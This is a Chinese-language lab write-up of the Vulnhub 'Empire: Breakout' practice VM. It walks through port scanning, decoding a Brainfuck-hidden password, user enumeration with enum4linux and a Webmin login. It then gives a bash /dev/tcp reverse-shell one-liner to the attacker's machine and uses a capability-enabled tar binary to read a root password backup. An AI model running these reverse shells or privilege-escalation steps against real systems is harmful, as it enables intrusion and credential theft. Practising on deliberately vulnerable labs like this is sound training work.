Vulnhub靶机Emplre: Breakout渗透测试详解
- Vulnhub靶机介绍:
- Vulnhub靶机下载:
- Vulnhub靶机安装:
- Vulnhub靶机漏洞详解:
- ①:信息收集:
- ②:登入后台:
- ③:GetShell:
- ④:tar命令执行提权:
- ⑤:获取FLAG:
- Vulnhub靶机渗透总结:
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这是一个漏洞靶机,老样子需要找到flag即可。
Vulnhub靶机下载:
官网链接:https://download.vulnhub.com/empire/02-Breakout.zip
Vulnhub靶机安装:
下载好了把安装包解压 然后使用VMware打开即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali
里使用arp-scan -l
发现主机
渗透机:kali IP :172.16.5.140 靶机IP :172.16.5.105
使用命令:
nmap -sS -sV -T4 -n -p- 172.16.5.105
访问80端口是一个Apache
的默认页面然后F12
查看源码发现Brainfuck
编码。
在线Brainfuck
解码:http://www.hiencode.com/brain.html
得到解密结果:.2uqPEfj3D<P'a-3
②:登入后台:
访问10000
端口是Webmin
20000
端口是Usermin
这里要使用一个工具:enum4linux
用于枚举得到cyber
用户 尝试登入,登入成功!!
③:GetShell:
左下角有command shell
命令 打开可以查看第一个flag
还有个tar
文件先使用nc
回弹到本机kali
使用命令:bash -i >/dev/tcp/172.16.5.140 0>&1
然后信息收集一波先看看权限 whoami
通过getcap
命令查看tar
得权限 有可以执行得权限
④:tar命令执行提权:
在/var/backups
下面发现了一个old_pass.bak
得隐藏备份文件,利用tar
读取密码备份文件
./tar -cvf pass.tar /var/backups/.old_pass.bak #这里一定要使用./不然没权限会以为是系统得tar
tar -xvf pass.tar
cat var/backups/.old_pass.bak #读取root密码
得到密码:Ts&4&YurgtRX(=~h
使用root
登入 登入成功!!
⑤:获取FLAG:
至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!
Vulnhub靶机渗透总结:
这个靶机难度比较简单
1.信息收集arp-scan -l
获取ip地址 和端口信息 web
扫描工具:nikto,dirb,dirbuster,whatweb
等 查看F12
源码信息‘
2.enum4linux
工具得使用(新知识点)用于账号枚举 Brainfuck
编码(经常做ctf
得肯定知道)
3.nc bash
反弹命令(经常做渗透得话这一条肯定要背下来得,不然每次看命令没有提升!!)
4.tar
命令执行提取读取
这篇完结啦!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!